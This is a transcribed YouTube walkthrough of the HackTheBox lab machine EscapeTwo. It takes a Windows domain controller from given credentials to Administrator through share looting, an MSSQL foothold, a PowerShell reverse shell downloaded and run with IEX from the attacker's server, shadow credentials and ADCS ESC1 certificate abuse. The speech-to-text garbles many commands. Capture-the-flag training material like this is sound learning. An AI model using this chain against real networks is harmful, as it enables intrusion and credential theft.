What's up YouTube? This is Tony from Reliable AI, and today we're going to do a walkthrough on a machine called EscapeTwo. We have already been given some credentials, so let's get started. We're going to start with an nmap scan, nmap default script, version, ports that are open, WinRM. WinRate, you're going to do 10,000 so that it can be fast. WinRate equals to 10,000, and then we're going to save it on a file called nmap scan. And then you're going to define the IP address 10.10.11.51. When you do that, I've already done that. When you do that, you're going to get these outputs. You're going to get these outputs. You're going to see which ports are open. DNS, KB roast, all these ports. These ports you can notice is very useful information. It's very unique. LDAP is also open. Now from this we're going to utilize the credentials that we have been given to see what we can do with them, to see which ports can we connect using it. We're going to use netexec. SMB. No. I forgot something very useful. From this nmap scan, we can notice that we have the domain name. SQL.tag the box. SQL.bios, DCO, DNS domain name, SQL.tag the box. Computer name dc01.sql.tag the box. With these details, you have to add them on the host files. That is sudo nano c hosts. So you're going to drop them here. After that, we're going to use netexec to see which ports can we actually authenticate using those credentials that we've been given. Netexec assembly 10.10.11.51 user roles password. So that let's see. You can also do let's see. We can actually authenticate using netexec SMB. We're going to enumerate shares, see which ones that we can read. Netexec 10.10.11.51 user roles password is equals to that. Let's see. Shares, you can see that you can actually read these files. IPC, net login, system volume, users. And also this one is very tricky. If you're scanning it fast, you won't notice it because I don't know. I actually forgot it. But this is the most important share that we need to actually enumerate. On the other side, you can see that when you authenticate using LDAP, you can also authenticate using MSSQL. MSSQL. From enumeration, we can also do enumerating the users. You can see that you can actually authenticate using MSSQL. It's actually working. We can try this OMI to see if it's actually enabled. It returned nothing. From the enumeration of users, we can see that we have some users here. You can use your tricks to add these users on a file. If you don't, actually, I think you can utilize ChatGPT to actually ask it to help you the trick. You can place all these into a single file. Yeah, I already done that. Nano, not nano, caps, users. These are the users. Yeah, now we're going to actually see what is inside this accounting department using SMB client. SMB client user rows standard 11.51 departments. Yeah, I think that's it. We're going to be asked for the password. We're going to provide it. Then we're in. When you actually enumerate the directory, you're going to see that you have these two files. To download them, you just have to use a get accounting you're going to do this 2 times. You're going to get with this file, then get this other file. But already done that. Exit. We need to cut accounting. Oh yeah, that's a folder. Accounting. Yeah, you can notice that this file actually they're unreadable because they're zip files. You have to unzip them. To unzip them is actually very easy. You just instead of cut, you use unzip. And that's it. You'll get some files from them. I already done that, and I'll actually put them on different folders, as you can see. Now from these, I think there's one that actually has the credentials. As a penetration tester, you have to ensure that you walk through all these files. You just go straight to something that you know that actually has credentials. As you can actually notice that we already have it. Yeah, first name, last name, email, username, password, Angela, Martin, email, username, then password. From these credentials, you can try them out if you have time, but for now, these credentials are what we actually want. These are actually, they're actually working for us. We're going to copy this. We're going to put it on. Going to put it here. Then we're going to do enumeration to see what we can do with it. SMB users, I don't think we can actually, we cannot authenticate using these credentials on SMB. See? But we can actually utilize it on MSSQL port, which actually it connects. MSSQL. Yeah. The login is from an untrusted domain and cannot be used with integrated authentication. Let's try again with or without localhost. Yes, you can notice that you can actually authenticate using on the MSSQL port. Where am I? You can notice that we have extra information. DC01, SQL, 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 SVC. And now from this, we're going to start actually wanting to reverse. We're going to, what is it called? We're going to, don't worry. Yeah, we're going to create a reverse shell. Copy user shell. User initial shells. We're going to use this one. And we're going to copy it on a file called shell.ps1. Now when you list the files, we see we have the extra file, so we're going to edit it. We're going to uncomment. If you don't understand this, you just have to read the comments and actually understand it. We're going to delete this the last file. Then as you delete, you can be reading those instructions. A simple and small reverse shell options and help remove the save space and comment and change the hard-coded IP addresses and port number in the below line, remove all comments as well. So we are going to uncomment this line, then move over here. to change it to your IP address. 10.14.3, then the port number, which for security experts will always go for this one, and that's it. Save it, then exit. Yeah. I'm going to split it. Start up Python server for downloading the file. Yeah. HTTP server import. Then we're going to start another lesson import. And then VP 01. And then here we are going to we're going to change this command to download the shell script that we have actually created. Capital X IEX new object net.web and download string HTTP portland 10.10.14.3 3000 and the file which is shell.p as well. And that's it. I don't really have any errors. You can notice this is a success. It has been downloaded. And look at here. We have something here, meaning actually this is a success. How do you check who am I? Yeah, that's it. We're going to close this window. We're going to close this. Nothing useful there. Mistake, huge mistake, but it's okay. You can still repeat the same process. What did we do? Yeah, no problem. Another window. Python 3 module HTTP and server. So put 8000. Just repeat the process once again. Once again, success. We are connected. Okay. We're going to cd to home directory. Let's see what is interesting here. Close this. Close this. From this output, you can notice that the most interesting thing that you can actually target is SQL 2019 because you can actually get some credentials from this file. ls SQL SQ cd SQ cd ls. And from this output, you can notice something interesting. The configuration file that we can actually target. We're going to actually use this that yeah, I had problems here. I will use this, but it's actually going to be a problem. It's going to output something that I don't want. So I'm going to ask for assistance from ChatGPT. GPT. And yeah, you don't have to remember everything. You can always rely on some help from experts. How do I read the files from? How do I not actually read the file, but contents? It's from this file. Copy using type. Yeah. Yeah, you can see you have a better output. Install. What is useful here? Oh yeah, we have new password here. That we are going to use. And so in case you're wondering what problems I was actually talking about, if you just type this, you're going to get something that is going to discourage you. And you're like, okay, I should have never done this. Well, you see, yeah, this is what I got. CD home. ls cd users. You're going to see which users actually are in this machine. As you can see, administrator, Ryan, SQL, SVC. Then we're going to get these credentials here. And from this credential, you're actually going to see any other account from the user list that you actually created earlier. How many accounts actually utilize the same password? I think we're done here. TaxZinc, SMB 10.10.11.1. User uses the text password equals to that. Yeah, let's see. Yeah, we can see that it's only one user that actually can authenticate using those credentials, and that is RAN. I think the other account should be SVC, the account that we actually were using earlier. From this, we can check this account able to log in using remote. I made a mistake, still using the same user list instead of the user that we have actually found. Ryan. Can we log into the machine using remote system, remote management? Actually, that is not the way. The right way is actually Windows remote management. Yeah, the user can actually sign in using remote management. And that means that now you can log in. If you're looking for if you're going for the flag, you can use these credentials to sign into the machine, and you'll get the flag in the desktop. And from this, you're going to use Python, Bloodhound. We're going to Bloodhound. You're going to get data that you can actually utilize to visualize in the Active Directory. User Ryan. Password is that what else? Is it an S? Let's see if you're going to fail or you're going to be a success. Let's see. Yeah, I have raise the server. That's a DNS operation timeout. Where did I? What is the mistake? Is it IP address? TCP. Unrecognized arguments. The domain. Password issues of method. Yeah, let's try. Yes. Then domain. Yes. SQL dot the box. I think this time it's going to work. Yep. Yeah, this is a success. Also, you can actually utilize, if you use those credentials, actually, it's also going to give you the same output. La, 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 la. How long is it going to take? Yeah, for us simple guys, this is for us. When you see others using sharp-hand, I don't know how to utilize it. I think you have to actually get used to your own preferred tool. From that, you'll have to sign into your Bloodhound account. Then you're going to administration. Yeah, as you can see, already actually loaded it. But in the process of actually loading those files, you just go to upload files, click here, home machines, EscapeTwo. Then I'm going to select all these JSON files at the counter. From that, you're going to click upload. But I already done that. We are going to wait for it to ingest. You cannot view the output while it's still ingesting. You have to ensure that it's actually complete like this one here. But since you already have this, you're going to move to explore. Then you're going to start with those. The first account that you actually had. It is already banned. You can realize that it is not actually that useful for us. It doesn't have something that you can actually utilize. We're going to check our new user, Ryan. Remember, once you see this thing, just know that we are almost there. This is an advantage, which means we have something that you can actually start with, attack vector. Ryan is a number of users, remote management users, domain users, management department, object control. Ryan has a right owner to CA SVC. And this account is actually interesting. You can actually notice it's a member of domain users, cert publishers. This is what we'll be targeting. Yeah, this is what we are going to target. But for now, you have to target the current, what is it called? CA SVC. Yeah, we're going to target this one. We're going to try to get these users hashes. Then from these user hashes, we're going to try to manipulate to get the certificate. Yeah. I'm going to clear this. We're going to use bloody user Ryan is that host 10.10.11.51. Then domain is SQL. Let's hide the box. We're going to set owner to SVC Ryan. Is that a success? Old owner is that replaced by Ryan. That is success. Going back. Now going to add generic all. I think that's it. Let's see, I'm going to get an error. Yeah. Medium error argument add get. I forgot to add the argument I get. No. Actually add. Yep, success. Now we're going to do a shadow credential attack. It is certify AD shadow laptop, then user Ryan, sword, then the account you're targeting, and CA is AC, then DCIP equals to 10.11.51. What did I forget? Argument addition invalid. Oh, shadow. Shadow. Let's say we're going to get an error. It's going to be a success. Yeah, this is a direct success. Just have to wait a little bit. And there we have it. This is the empty hash for this user. I'm going to add it to so that you cannot forget it. Let's see. Yes, let's see. Now you're going to see what vulnerabilities on the certificate. Certify AD. Find the user UCA yes BC and hashes. Going to drop it there, and then we're going to BC like B equals to 10.11.51. Then what is it about? What else? Is that it? Vulnerable. I don't know if I forgot something. Yeah, there's a success. We're going to find if this certificate actually has some vulnerabilities. If it has, we're going to abuse it. Also, yeah, from the output of this, you can also load it to Bloodhound, and then you can visualize how your attack vector will be. So we have these files. We are going to cut on one to see what we have. Actually, I think now we're in the phase where you're trying to do a privilege escalation. You're trying to get the administrator credentials or hashes. Yeah, from this output, we can see the MSSQL. You can see the CNAME, certificate name, certificate of the authority. owner, administrators, access rights, manage, certificate authority, administrators, domain admins, enterprise admins, manage certificates, administrators. The template is done mail-fin authentication. Certificate authorities, name of client authentication, certificate name, requires manage approval, false. Yeah, this is a vulnerability. This is not nice. From this, we have user has dangerous permissions. Yeah, from my understanding is that I'm not sure, I cannot explain to you guys very well, but from this I understand that you can actually abuse this, then actually request for admin credentials. No, actually not credentials, but certificate. From that you're going to actually request for, you can actually get admin hashes from that certificate. Actually from now you have to actually, to make it more vulnerable, we are going to force this to actually utilize ESCC1. We're going to certify AD. Certify AD template user is CA is basic, then hashes. So we're going to drop our hashes, then the template name. Template is then the mail-fin. SCA is yeah. And then I'm not sure if this is going to work, but let's try. Right, default configuration. Yes, I certify CA error and recognize arguments. CA, yeah, right. This is not necessary for now, but you can notice you're going to actually, it advantage to actually to use ESCA1, which is actually more vulnerable. But I cannot find the target in the specified options. Target. Do you have to specify target? Oh yeah, I forgot to actually import this CIP. CIP turn out 11. 51. Yeah, this is a success. Got another huge mistake. That's okay. We make mistakes and we get better. Cheers. Let's see. Do you want yes? But if you want to apply these changes to identify this, this is actually success. Okay, this is a success that we're going to move to another phase whereby we request a certificate as admin. Certify request. Yeah, since we have reverted to ESC1, that means that we can just request it the admin certificate without actually being the actual admin. This is actually a vulnerability. Yeah. User CM SSC. Option that SQL dot the box. Yes. This is very, yeah, this is very actually confused. It's requesting a request where I was not supposed to actually request for it. CA is SQL DC 01 01 01 C template Dandamilfen. Template, that is the template, and then the user that you actually want to use VPN administrator SQL dot the box target is C01 dot SQL dot the box target IP standard 11.51. Yeah, is it going to work? Let's try it. DNS resolution failed, the DNS query name. Access denied. There's something actually. Maybe this was a success. So what is the problem here? What did we go wrong? VPN target IP. Request user shell CA simple DC1 template. Let's try it one more time. Access denied. Access denied. Yeah, let's try one more time. Certify template. User hashes template. With default configuration. Yeah. I think I made a mistake here. Instead of that, it should have been CA at SQL the box. I noticed I actually had a mistake here. This is the user. The problem that I actually had is I actually used CA instead of CASVC. Now let's hope that it's going to work. DNS resolution failed. Yes, query name does not exist. The identifier just already exists, alright? Yes. Same now. We'll say with a unique name. I'm going to say it. Yes. Are you sure you want to save these files? Yes. Successful. Now let's go back. The request. Yeah, request. CA. Should be CA SVC. CA SVC. Would you like to save the private key? Yes. This means a success. They failed to request this. Yes, then the private key to failed. Where will be back? Where did I go wrong? Anything different from these two reports? Template, VPN administrator. Target, this is SQL. Target. I don't know where I went wrong here, but for some reason this is a success. If you can actually see where I went wrong, you can actually tell me from the comment section. From this, we're going to auth. There's an admin. Certify AD. GPX. Administrator that, then DC DCP term.11.51, then hosts. Host is equal to SQL track from the box. DC certify all the following arguments are required. EPX. Oh, made a mistake there. PFX. Unrecognized arguments. Got hash for administrator. This is a success. This is what we have been working hard for. Yeah, the administrator hash is starting from here. you can actually you can use it by signing in using Evil Windows Remote Management. Evil 10.10.11 user administrator hashes, actually hash let's say, yeah, we are in cd minus cd, actually no, who am I? Administrator, who am I? Oh, yeah. We made it this far. If you watched this video to this end, if you watched it to this end, so I failed many times, thank you. You can subscribe to my channel, you can like this video, and you can comment. Thank you. See you in the next tutorial.